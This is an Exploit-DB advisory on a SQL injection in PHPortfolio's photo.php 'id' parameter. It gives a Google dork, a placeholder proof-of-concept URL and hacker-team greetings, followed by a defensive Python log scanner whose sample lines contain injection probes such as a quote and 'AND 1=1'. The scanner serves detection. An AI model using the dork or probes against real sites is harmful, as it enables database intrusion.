PHPortfolio – SQL Injection

  • Author: lionaneesh
    Date: 2011-05-23
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17316/
  • # Exploit Title: SQL Injection Vulnerability in PHP Portfolio
    # Google Dork: "Powered by PHPortfolio"
    # Date: 23/5/2011
    # Author: lionaneesh
    # Software Link: http://outshine.com/phportfolio/ http://www.outshine.com/software/phportfolio/intro.php
    # Risk Level : High
    # A hacker can get admin access to the web database, leading to further
    attacks, shelling and rooting of the server
    
    POC :-
    
    http://[sitename]/[pathToApplication]/photo.php?id=%InjectHere%
    
    
    Sample :-
    
    http://site.com/work/photo.php?id=%injectHere%19
    
    --------------------------------------------------------------------------------
    ================================================================================
    lionaneesh
    
    Catch my News : http://www.thehackernews.com/search?q=lionaneesh
    
    Greetz to : lucky(indishell) , Aasim Shaikh(indishell) , Team
    Indishell , Team ICA
    
    Hack For INDIA , Live for INDIA
    
    ================================================================================
    --------------------------------------------------------------------------------
    
    -- 
    Thanks
    Aneesh Dogra (lionaneesh)
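
For defenders reviewing web server logs for requests against the `photo.php?id=` parameter named above, the following is an added example, not part of the original advisory or of PHPortfolio. It assumes that legitimate `id` values are plain integers (as in the advisory's sample, `19`) and that logs are in combined log format; the log lines, addresses and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); all values are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [23/May/2011:10:01:02 +0000] "GET /work/photo.php?id=19 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [23/May/2011:10:01:09 +0000] "GET /work/photo.php?id=19%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.4 - - [23/May/2011:10:02:30 +0000] "GET /work/photo.php?id=19+AND+1%3D1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.4 - - [23/May/2011:10:02:31 +0000] "GET /work/index.php?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
192.0.2.55 - - [23/May/2011:10:03:00 +0000] "GET /work/photo.php HTTP/1.1" 200 700 "-" "Mozilla/5.0"
"""

# client, timestamp, method, request target, status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Assumption: a legitimate photo id is a short run of ASCII digits.
ID_OK = re.compile(r"[0-9]{1,10}")


def suspicious_photo_requests(log_text):
    """Return photo.php requests whose id parameter is not a plain integer."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        client, when, _method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/photo.php"):
            continue
        # parse_qs percent-decodes values, so encoded quotes and spaces are seen
        # in decoded form; keep_blank_values makes an empty "id=" visible too.
        ids = parse_qs(url.query, keep_blank_values=True).get("id", [])
        non_numeric = [v for v in ids if not ID_OK.fullmatch(v)]
        # A repeated id parameter is also unexpected for this page.
        if non_numeric or len(ids) > 1:
            findings.append(
                {"client": client, "time": when, "status": int(status), "id": ids}
            )
    return findings


if __name__ == "__main__":
    for hit in suspicious_photo_requests(SAMPLE_LOG):
        print(hit)
```

A 5xx status on a flagged request is worth triaging first, since it suggests the malformed value reached the database layer.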